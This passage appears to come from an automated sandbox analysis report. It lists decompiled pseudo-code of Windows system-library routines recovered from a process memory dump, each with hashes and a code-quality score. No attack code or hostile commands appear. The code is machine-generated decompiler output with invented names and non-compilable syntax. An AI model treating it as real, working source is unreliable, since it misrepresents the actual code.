                        				signed char* _t21;
                        				void* _t24;
                        				void* _t36;
                        				void* _t38;
                        				void* _t46;
                        
                        				_push(_t36);
                        				_t46 = __edx;
                        				_v12 = 0;
                        				_v8 = 0;
                        				_v20 = 0;
                        				_v16 = 0;
                        				if(E02BB7D50() == 0) {
                        					_t21 = 0x7ffe0384;
                        				} else {
                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                        				}
                        				if( *_t21 != 0) {
                        					_t21 =  *[fs:0x30];
                        					if((_t21[0x240] & 0x00000004) != 0) {
                        						if(E02BB7D50() == 0) {
                        							_t21 = 0x7ffe0385;
                        						} else {
                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                        						}
                        						if(( *_t21 & 0x00000020) != 0) {
                        							_t56 = _t46;
                        							if(_t46 == 0) {
                        								_t46 = 0x2b75c80;
                        							}
                        							_push(_t46);
                        							_push( &_v12);
                        							_t24 = E02BCF6E0(_t36, 0, _t46, _t56);
                        							_push(_a4);
                        							_t38 = _t24;
                        							_push( &_v28);
                        							_t21 = E02BCF6E0(_t38, 0, _t46, _t56);
                        							if(_t38 != 0) {
                        								if(_t21 != 0) {
                        									E02C17016(_a8, 0, 0, 0,  &_v36,  &_v28);
                        									L02BB2400( &_v52);
                        								}
                        								_t21 = L02BB2400( &_v28);
                        							}
                        						}
                        					}
                        				}
                        				return _t21;
                        			}




















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae88b9bc2cb90c45efdf9acbc430b7471c9ed3088acf7efe97759637d5f8d23d
                        • Instruction ID: d6872cdb056d66687324a3fb546a12f54398c82e1c8ae98df962bd35c9764498
                        • Opcode Fuzzy Hash: ae88b9bc2cb90c45efdf9acbc430b7471c9ed3088acf7efe97759637d5f8d23d
                        • Instruction Fuzzy Hash: 6E21C5725043449FC711EF2AC945BA7B7EDAFC2748F1405AAFD40C7251DB34D609DAA2
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 67%
                        			E02C6070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                        				char _v8;
                        				intOrPtr _v11;
                        				signed int _v12;
                        				intOrPtr _v15;
                        				signed int _v16;
                        				intOrPtr _v28;
                        				void* __ebx;
                        				char* _t32;
                        				signed int* _t38;
                        				signed int _t60;
                        
                        				_t38 = __ecx;
                        				_v16 = __edx;
                        				_t60 = E02C607DF(__ecx, __edx,  &_a4,  &_a8, 2);
                        				if(_t60 != 0) {
                        					_t7 = _t38 + 0x38; // 0x29cd5903
                        					_push( *_t7);
                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                        					_push( *_t9);
                        					_v12 = _a8 << 0xc;
                        					_t11 = _t38 + 4; // 0x5de58b5b
                        					_push(0x4000);
                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                        					E02C5AFDE( &_v8,  &_v12);
                        					E02C61293(_t38, _v28, _t60);
                        					if(E02BB7D50() == 0) {
                        						_t32 = 0x7ffe0380;
                        					} else {
                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                        					}
                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                        						E02C514FB(_t38,  *_t21, _v11, _v15, 0xd);
                        					}
                        				}
                        				return  ~_t60;
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction ID: 0b52d33625d7861f439b2121336458464ea1129ce804a9680fdad5223c82cf39
                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                        • Instruction Fuzzy Hash: 3D21D4362042049FD715DF18C888B6ABBE6FFC4750F048669F9959B385DB70DD09CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 96%
                        			E02BBAE73(intOrPtr __ecx, void* __edx) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				char* _t22;
                        				signed char* _t24;
                        				intOrPtr _t25;
                        				intOrPtr _t27;
                        				void* _t31;
                        				intOrPtr _t36;
                        				char* _t38;
                        				signed char* _t42;
                        
                        				_push(__ecx);
                        				_t31 = __edx;
                        				_v8 = __ecx;
                        				_t19 = E02BB7D50();
                        				_t38 = 0x7ffe0384;
                        				if(_t19 != 0) {
                        					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        				} else {
                        					_t22 = 0x7ffe0384;
                        				}
                        				_t42 = 0x7ffe0385;
                        				if( *_t22 != 0) {
                        					if(E02BB7D50() == 0) {
                        						_t24 = 0x7ffe0385;
                        					} else {
                        						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                        					}
                        					if(( *_t24 & 0x00000010) != 0) {
                        						goto L17;
                        					} else {
                        						goto L3;
                        					}
                        				} else {
                        					L3:
                        					_t27 = E02BB7D50();
                        					if(_t27 != 0) {
                        						_t27 =  *[fs:0x30];
                        						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
                        					}
                        					if( *_t38 != 0) {
                        						_t27 =  *[fs:0x30];
                        						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
                        							goto L5;
                        						}
                        						_t27 = E02BB7D50();
                        						if(_t27 != 0) {
                        							_t27 =  *[fs:0x30];
                        							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
                        						}
                        						if(( *_t42 & 0x00000020) != 0) {
                        							L17:
                        							_t25 = _v8;
                        							_t36 = 0;
                        							if(_t25 != 0) {
                        								_t36 =  *((intOrPtr*)(_t25 + 0x18));
                        							}
                        							_t27 = E02C17794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
                        						}
                        						goto L5;
                        					} else {
                        						L5:
                        						return _t27;
                        					}
                        				}
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction ID: d73c02571637f22aad65ad461c790b129fa4868a3446c03f4f60c71a407d2528
                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                        • Instruction Fuzzy Hash: 8821F672A01680DFD7279B69C988B7977E9EF84754F1900E0DD048B7D2DBB4DD40CA91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02C17794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                        				intOrPtr _v8;
                        				intOrPtr _v12;
                        				intOrPtr _t21;
                        				void* _t24;
                        				intOrPtr _t25;
                        				void* _t36;
                        				short _t39;
                        				signed char* _t42;
                        				unsigned int _t46;
                        				void* _t50;
                        
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t21 =  *0x2c87b9c; // 0x0
                        				_t46 = _a8;
                        				_v12 = __edx;
                        				_v8 = __ecx;
                        				_t4 = _t46 + 0x2e; // 0x2e
                        				_t36 = _t4;
                        				_t24 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                        				_t50 = _t24;
                        				if(_t50 != 0) {
                        					_t25 = _a4;
                        					if(_t25 == 5) {
                        						L3:
                        						_t39 = 0x14b1;
                        					} else {
                        						_t39 = 0x14b0;
                        						if(_t25 == 6) {
                        							goto L3;
                        						}
                        					}
                        					 *((short*)(_t50 + 6)) = _t39;
                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                        					_t11 = _t50 + 0x2c; // 0x2c
                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                        					E02BDF3E0(_t11, _a12, _t46);
                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                        					if(E02BB7D50() == 0) {
                        						_t42 = 0x7ffe0384;
                        					} else {
                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                        					}
                        					_push(_t50);
                        					_t19 = _t36 - 0x20; // 0xe
                        					_push(0x403);
                        					_push( *_t42 & 0x000000ff);
                        					E02BD9AE0();
                        					_t24 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                        				}
                        				return _t24;
                        			}














                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ba5eb2d9745c5fb69071a5de748887a8119901682336643e3237469aaa20b37
                        • Instruction ID: 00741b85bc9a0ddcbadcebd99d31469e605661c4f2eb9e1b7a1547ab7ae108ba
                        • Opcode Fuzzy Hash: 5ba5eb2d9745c5fb69071a5de748887a8119901682336643e3237469aaa20b37
                        • Instruction Fuzzy Hash: 3F21A172900604ABC725DF69DC90EABB7B9EF89340F10456DF50AD7750EB34EA04CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02BCFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                        				intOrPtr _v8;
                        				void* _t19;
                        				intOrPtr _t29;
                        				intOrPtr _t32;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t40;
                        
                        				_t35 = __edx;
                        				_push(__ecx);
                        				_push(__ecx);
                        				_t37 = 0;
                        				_v8 = __edx;
                        				_t29 = __ecx;
                        				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
                        					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
                        					L3:
                        					_t19 = _a4 - 4;
                        					if(_t19 != 0) {
                        						if(_t19 != 1) {
                        							L7:
                        							return _t37;
                        						}
                        						if(_t35 == 0) {
                        							L11:
                        							_t37 = 0xc000000d;
                        							goto L7;
                        						}
                        						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
                        							L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
                        							_t35 = _v8;
                        						}
                        						 *((intOrPtr*)(_t40 + 4)) = _t35;
                        						goto L7;
                        					}
                        					if(_t29 == 0) {
                        						goto L11;
                        					}
                        					_t32 =  *_t40;
                        					if(_t32 != 0) {
                        						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
                        						E02BA76E2( *_t40);
                        					}
                        					 *_t40 = _t29;
                        					goto L7;
                        				}
                        				_t40 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
                        				if(_t40 == 0) {
                        					_t37 = 0xc0000017;
                        					goto L7;
                        				}
                        				_t35 = _v8;
                        				 *_t40 = 0;
                        				 *((intOrPtr*)(_t40 + 4)) = 0;
                        				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
                        				goto L3;
                        			}











                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction ID: e36b7e9c45b26054873a18f925ece6d1a22331c2a24374d98a04582d804c09ac
                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                        • Instruction Fuzzy Hash: 812179B2A00A41DBC731CF0AC540FB6F7E6EB94B10F2481EEE9498BA11D730AD00DB80
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 77%
                        			E02B99240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                        				intOrPtr _t33;
                        				intOrPtr _t37;
                        				intOrPtr _t41;
                        				intOrPtr* _t46;
                        				void* _t48;
                        				intOrPtr _t50;
                        				intOrPtr* _t60;
                        				void* _t61;
                        				intOrPtr _t62;
                        				intOrPtr _t65;
                        				void* _t66;
                        				void* _t68;
                        
                        				_push(0xc);
                        				_push(0x2c6f708);
                        				E02BED08C(__ebx, __edi, __esi);
                        				_t65 = __ecx;
                        				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
                        				if( *(__ecx + 0x24) != 0) {
                        					_push( *(__ecx + 0x24));
                        					E02BD95D0();
                        					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
                        				}
                        				L6();
                        				L6();
                        				_push( *((intOrPtr*)(_t65 + 0x28)));
                        				E02BD95D0();
                        				_t33 =  *0x2c884c4; // 0x0
                        				L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
                        				_t37 =  *0x2c884c4; // 0x0
                        				L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
                        				_t41 =  *0x2c884c4; // 0x0
                        				E02BB2280(L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x2c886b4);
                        				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
                        				_t46 = _t65 + 0xe8;
                        				_t62 =  *_t46;
                        				_t60 =  *((intOrPtr*)(_t46 + 4));
                        				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
                        					_t61 = 3;
                        					asm("int 0x29");
                        					_push(_t65);
                        					_t66 = _t61;
                        					_t23 = _t66 + 0x14; // 0x8df8084c
                        					_push( *_t23);
                        					E02BD95D0();
                        					_t24 = _t66 + 0x10; // 0x89e04d8b
                        					_push( *_t24);
                        					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
                        					_t48 = E02BD95D0();
                        					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
                        					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
                        					return _t48;
                        				} else {
                        					 *_t60 = _t62;
                        					 *((intOrPtr*)(_t62 + 4)) = _t60;
                        					 *(_t68 - 4) = 0xfffffffe;
                        					E02B99325();
                        					_t50 =  *0x2c884c4; // 0x0
                        					return E02BED0D1(L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
                        				}
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID: InitializeThunk
                        • String ID:
                        • API String ID: 2994545307-0
                        • Opcode ID: 38dc40c5ef69e7f70722b9ecf4e4c531b576ee09f66aafb7c7ec2698e76bfb99
                        • Instruction ID: 9e96f6e731d97b3ad716d0fff965f50fa89563f6fe354379ee6860ab88f22519
                        • Opcode Fuzzy Hash: 38dc40c5ef69e7f70722b9ecf4e4c531b576ee09f66aafb7c7ec2698e76bfb99
                        • Instruction Fuzzy Hash: 3D215132480A40DFC762EF18CA50F59B7BAFF04704F5586ACE04A87AA1CB74E951DF44
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02BCB390(void* __ecx, intOrPtr _a4) {
                        				signed int _v8;
                        				signed char _t12;
                        				signed int _t16;
                        				signed int _t21;
                        				void* _t28;
                        				signed int _t30;
                        				signed int _t36;
                        				signed int _t41;
                        
                        				_push(__ecx);
                        				_t41 = _a4 + 0xffffffb8;
                        				E02BB2280(_t12, 0x2c88608);
                        				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
                        				asm("sbb edi, edi");
                        				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
                        				_v8 = _t36;
                        				asm("lock cmpxchg [ebx], ecx");
                        				_t30 = 1;
                        				if(1 != 1) {
                        					while(1) {
                        						_t21 = _t30 & 0x00000006;
                        						_t16 = _t30;
                        						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
                        						asm("lock cmpxchg [edi], esi");
                        						if(_t16 == _t30) {
                        							break;
                        						}
                        						_t30 = _t16;
                        					}
                        					_t36 = _v8;
                        					if(_t21 == 2) {
                        						_t16 = E02BD00C2(0x2c88608, 0, _t28);
                        					}
                        				}
                        				if(_t36 != 0) {
                        					_t16 = L02BB77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
                        				}
                        				return _t16;
                        			}












                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dc1c4a086b7cd3f57aa55381e02a33fdceadd11c39914fc02e917b0744d6751
                        • Instruction ID: 447c53ebf5796c0ec1c39c0e112b900642bff02b5266544ffbbd88746703a4d4
                        • Opcode Fuzzy Hash: 2dc1c4a086b7cd3f57aa55381e02a33fdceadd11c39914fc02e917b0744d6751
                        • Instruction Fuzzy Hash: 681144777112149BCB29DA258D82A6F7397EBC5334B38826DDE16DB7C0DA31AC02C694
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E02C24257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
                        				intOrPtr* _t18;
                        				intOrPtr _t24;
                        				intOrPtr* _t27;
                        				intOrPtr* _t30;
                        				intOrPtr* _t31;
                        				intOrPtr _t33;
                        				intOrPtr* _t34;
                        				intOrPtr* _t35;
                        				void* _t37;
                        				void* _t38;
                        				void* _t39;
                        				void* _t43;
                        
                        				_t39 = __eflags;
                        				_t35 = __edi;
                        				_push(8);
                        				_push(0x2c708d0);
                        				E02BED08C(__ebx, __edi, __esi);
                        				_t37 = __ecx;
                        				E02C241E8(__ebx, __edi, __ecx, _t39);
                        				E02BAEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
                        				_t18 = _t37 + 8;
                        				_t33 =  *_t18;
                        				_t27 =  *((intOrPtr*)(_t18 + 4));
                        				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
                        					L8:
                        					_push(3);
                        					asm("int 0x29");
                        				} else {
                        					 *_t27 = _t33;
                        					 *((intOrPtr*)(_t33 + 4)) = _t27;
                        					_t35 = 0x2c887e4;
                        					_t18 =  *0x2c887e0; // 0x0
                        					while(_t18 != 0) {
                        						_t43 = _t18 -  *0x2c85cd0; // 0xffffffff
                        						if(_t43 >= 0) {
                        							_t31 =  *0x2c887e4; // 0x0
                        							_t18 =  *_t31;
                        							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
                        								goto L8;
                        							} else {
                        								 *0x2c887e4 = _t18;
                        								 *((intOrPtr*)(_t18 + 4)) = _t35;
                        								L02B97055(_t31 + 0xfffffff8);
                        								_t24 =  *0x2c887e0; // 0x0
                        								_t18 = _t24 - 1;
                        								 *0x2c887e0 = _t18;
                        								continue;
                        							}
                        						}
                        						goto L9;
                        					}
                        				}
                        				L9:
                        				__eflags =  *0x2c85cd0;
                        				if( *0x2c85cd0 <= 0) {
                        					L02B97055(_t37);
                        				} else {
                        					_t30 = _t37 + 8;
                        					_t34 =  *0x2c887e8; // 0x0
                        					__eflags =  *_t34 - _t35;
                        					if( *_t34 != _t35) {
                        						goto L8;
                        					} else {
                        						 *_t30 = _t35;
                        						 *((intOrPtr*)(_t30 + 4)) = _t34;
                        						 *_t34 = _t30;
                        						 *0x2c887e8 = _t30;
                        						 *0x2c887e0 = _t18 + 1;
                        					}
                        				}
                        				 *(_t38 - 4) = 0xfffffffe;
                        				return E02BED0D1(L02C24320());
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b082f9a86a8dd31948fac99cb99760ad9797f09e6faf7f26a07521386199062a
                        • Instruction ID: 47f8cd87ac52bb4dc7dee6564c0044cc817f044c7b7d107dec25cf25286472f5
                        • Opcode Fuzzy Hash: b082f9a86a8dd31948fac99cb99760ad9797f09e6faf7f26a07521386199062a
                        • Instruction Fuzzy Hash: 77216774A80A15CFCB28DF26D900B14BBF2FB85715BA4C7AAE1198B690DF31D595CF10
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 34%
                        			E02BC2397(intOrPtr _a4) {
                        				void* __ebx;
                        				void* __ecx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				signed int _t11;
                        				void* _t19;
                        				void* _t25;
                        				void* _t26;
                        				intOrPtr _t27;
                        				void* _t28;
                        				void* _t29;
                        
                        				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                        				if( *0x2c8848c != 0) {
                        					L02BBFAD0(0x2c88610);
                        					if( *0x2c8848c == 0) {
                        						E02BBFA00(0x2c88610, _t19, _t27, 0x2c88610);
                        						goto L1;
                        					} else {
                        						_push(0);
                        						_push(_a4);
                        						_t26 = 4;
                        						_t29 = E02BC2581(0x2c88610, 0x2b750a0, _t26, _t27, _t28);
                        						E02BBFA00(0x2c88610, 0x2b750a0, _t27, 0x2c88610);
                        					}
                        				} else {
                        					L1:
                        					_t11 =  *0x2c88614; // 0x1
                        					if(_t11 == 0) {
                        						_t11 = E02BD4886(0x2b71088, 1, 0x2c88614);
                        					}
                        					_push(0);
                        					_push(_a4);
                        					_t25 = 4;
                        					_t29 = E02BC2581(0x2c88610, (_t11 << 4) + 0x2b75070, _t25, _t27, _t28);
                        				}
                        				if(_t29 != 0) {
                        					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                        					 *((char*)(_t29 + 0x40)) = 0;
                        				}
                        				return _t29;
                        			}
















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 90f73ab1cec4b87d2c94f2eba972c40f90757a3f0a19bc5c54b935ad26571119
                        • Instruction ID: 75e596fca64d882bba6907037cc39bd24efefa72062f50cc85f0977f3e7d80e6
                        • Opcode Fuzzy Hash: 90f73ab1cec4b87d2c94f2eba972c40f90757a3f0a19bc5c54b935ad26571119
                        • Instruction Fuzzy Hash: D9112F327843045BD734963D9C90B26729DFFD0750F64C599FD02A7551C6B0D800CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 93%
                        			E02C146A7(signed short* __ecx, unsigned int __edx, char* _a4) {
                        				signed short* _v8;
                        				unsigned int _v12;
                        				intOrPtr _v16;
                        				signed int _t22;
                        				signed char _t23;
                        				short _t32;
                        				void* _t38;
                        				char* _t40;
                        
                        				_v12 = __edx;
                        				_t29 = 0;
                        				_v8 = __ecx;
                        				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                        				_t38 = L02BB4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                        				if(_t38 != 0) {
                        					_t40 = _a4;
                        					 *_t40 = 1;
                        					E02BDF3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                        					_t22 = _v12 >> 1;
                        					_t32 = 0x2e;
                        					 *((short*)(_t38 + _t22 * 2)) = _t32;
                        					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                        					_t23 = E02BCD268(_t38, 1);
                        					asm("sbb al, al");
                        					 *_t40 =  ~_t23 + 1;
                        					L02BB77F0(_v16, 0, _t38);
                        				} else {
                        					 *_a4 = 0;
                        					_t29 = 0xc0000017;
                        				}
                        				return _t29;
                        			}












                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction ID: fedce59b2736565459ff27417022c9e299596259456c61f9bb635b5d2d83f690
                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                        • Instruction Fuzzy Hash: 9411C272904208BBC7159F6DD8809BEB7BAEF95314F1080AAF9848B351DA318D55D7A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 42%
                        			E02B9C962(char __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				intOrPtr _t19;
                        				char _t22;
                        				intOrPtr _t26;
                        				intOrPtr _t27;
                        				char _t32;
                        				char _t34;
                        				intOrPtr _t35;
                        				intOrPtr _t37;
                        				intOrPtr* _t38;
                        				signed int _t39;
                        
                        				_t41 = (_t39 & 0xfffffff8) - 0xc;
                        				_v8 =  *0x2c8d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                        				_t34 = __ecx;
                        				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                        					_t26 = 0;
                        					E02BAEEF0(0x2c870a0);
                        					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                        					if(E02C1F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                        						L9:
                        						E02BAEB70(_t29, 0x2c870a0);
                        						_t19 = _t26;
                        						L2:
                        						_pop(_t35);
                        						_pop(_t37);
                        						_pop(_t27);
                        						return E02BDB640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                        					}
                        					_t29 = _t34;
                        					_t26 = E02C1F1FC(_t34, _t32);
                        					if(_t26 < 0) {
                        						goto L9;
                        					}
                        					_t38 =  *0x2c870c0; // 0x0
                        					while(_t38 != 0x2c870c0) {
                        						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                        						_t38 =  *_t38;
                        						_v12 = _t22;
                        						if(_t22 != 0) {
                        							_t29 = _t22;
                        							 *0x2c8b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                        							_v12();
                        						}
                        					}
                        					goto L9;
                        				}
                        				_t19 = 0;
                        				goto L2;
                        			}



















                        Memory Dump Source
                        • Source File: 00000010.00000002.517573990.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: true
                        • Associated: 00000010.00000002.517876378.0000000002C8B000.00000040.00000001.sdmp
                        • Associated: 00000010.00000002.517885571.0000000002C8F000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f30041a3e80fb1b775375c5a3334c28d9cd70b2b5f5024362d088784312af248
                        • Instruction ID: 196d88de614cd81fd3d89740f2b5e08cd4fd95dcbd437a1906cfcfc6d1f32dae
                        • Opcode Fuzzy Hash: f30041a3e80fb1b775375c5a3334c28d9cd70b2b5f5024362d088784312af248
                        • Instruction Fuzzy Hash: E7112531700A029BDB14AF28CC95A2BF7E6BBC4714B200539F84283691EB20FD18DBC1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 87%
